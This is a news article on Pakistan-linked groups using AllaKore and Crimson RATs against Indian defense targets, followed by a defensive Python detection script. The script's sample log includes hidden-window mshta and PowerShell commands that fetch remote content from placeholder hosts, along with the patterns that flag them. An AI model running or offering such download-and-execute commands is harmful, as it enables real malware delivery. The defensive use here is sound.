Pakistani RAT attacks on India's defense sector escalate ahead of election

Father

Two groups of hackers distribute their Trojans at once, working closely with each other.

In recent weeks, cyber attacks on Indian government agencies initiated by groups with ties to Pakistan have increased. The Seqrite Labs analytical team identified several campaigns that actively used Remote Access Trojans (RATs). Experts confirmed the connection between the SideCopy and Transparent Tribe (APT36) groups, finding similarities in the program code and shared use of the same C2 infrastructure.

It is noted that the SideCopy group used AllaKore RAT in three campaigns, and in each of them hackers deployed two copies of the Trojan at once. Transparent Tribe, in turn, actively uses Crimson RAT, applying it in encrypted and packaged forms.

The main targets of these cyber attacks are defense and government structures in India. Both groups have been aggressively trying to infiltrate these sectors since at least 2019. The growth of such malicious activity is accompanied by a constant increase in sales of access to the systems of Indian organizations on underground forums.

The infection process usually starts with a phishing email containing an archive with a shortcut file, which starts a hidden process followed by downloading malicious files from compromised domains.

Remote access Trojans deployed in the system are able to collect information about the system, manage files, and intercept clipboard data, demonstrating a high degree of threat when it comes to military installations in the country.

SideCopy and Transparent Tribe use encrypted strings to communicate with C2 servers, which makes it difficult to detect malicious operations. The compromised domains and IP addresses used in the campaigns make it possible to track the groups' activity from last year.

Due to the increase in cyber attacks in the run-up to the Indian elections, experts recommend that local organizations strengthen their cybersecurity measures. Analysts emphasize the need to protect against threats, especially in the context of global geopolitical conflicts that can provoke new attacks.

Thus, the observed increase in cyber attacks on India requires increased attention to cybersecurity at the state and corporate levels, as well as increased international cooperation in countering such cyber threats.
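As an added defender-side illustration (not part of the original post and not Seqrite Labs' tooling), the script below runs a small detection over constructed process-creation log lines for the chain the post describes: a shortcut launched from the shell starting a hidden console process that then fetches content from a remote host. The log format, field names, the hypothetical host names and the scoring threshold are all assumptions chosen for the example, not a real EDR schema or vendor signature.

```python
"""
Added example, not from the post or from Seqrite Labs: score process-creation
events for the shortcut -> hidden process -> remote download pattern.

Assumed (hypothetical) log format: "key=value" pairs separated by " | " with
the keys ts, parent, image and cmdline. Sample lines are constructed; the
hosts use TEST-NET and the reserved .invalid TLD.
"""
import re
from dataclasses import dataclass

# Constructed sample events: two suspicious launches and two benign ones.
SAMPLE_LOG = """\
ts=2024-04-10T09:12:01Z | parent=explorer.exe | image=cmd.exe | cmdline=cmd.exe /c start /min mshta.exe http://203.0.113.10/update.hta
ts=2024-04-10T09:12:03Z | parent=explorer.exe | image=powershell.exe | cmdline=powershell.exe -w hidden -nop -c "iwr http://downloads.example.invalid/doc.pdf -OutFile C:\\Users\\Public\\doc.pdf"
ts=2024-04-10T09:15:44Z | parent=explorer.exe | image=notepad.exe | cmdline=notepad.exe C:\\Users\\alice\\notes.txt
ts=2024-04-10T09:16:02Z | parent=winword.exe | image=splwow64.exe | cmdline=splwow64.exe 12288
"""

# Indicators used by the scorer (assumptions for this example).
HIDDEN_WINDOW = re.compile(r"(-w(indowstyle)?\s+hidden|/min\b|-nop\b)", re.I)
URL = re.compile(r"\bhttps?://[^\s\"']+", re.I)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}
# A double-clicked .lnk runs its target as a child of the shell process.
SHELL_PARENTS = {"explorer.exe"}


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> Event:
    """Parse one 'key=value | key=value' line into an Event."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return Event(fields["ts"], fields["parent"].lower(),
                 fields["image"].lower(), fields["cmdline"])


def score(ev: Event) -> tuple[int, list[str]]:
    """Return (number of matched indicators, human-readable reasons)."""
    reasons = []
    if ev.parent in SHELL_PARENTS and ev.image in SCRIPT_HOSTS:
        reasons.append("script host spawned directly from the shell (shortcut-style launch)")
    if HIDDEN_WINDOW.search(ev.cmdline):
        reasons.append("hidden or minimised window requested")
    if URL.search(ev.cmdline):
        reasons.append("remote URL in command line (download stage)")
    return len(reasons), reasons


def detect(log_text: str, threshold: int = 3) -> list[dict]:
    """Return events whose indicator count reaches the threshold."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        count, reasons = score(ev)
        if count >= threshold:
            hits.append({"ts": ev.ts, "image": ev.image, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ts"], hit["image"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Requiring all three indicators at once keeps ordinary shell launches (the notepad line) and unrelated parent/child pairs out of the results; lowering the threshold trades that precision for broader coverage of either the hidden-window or the download stage on its own.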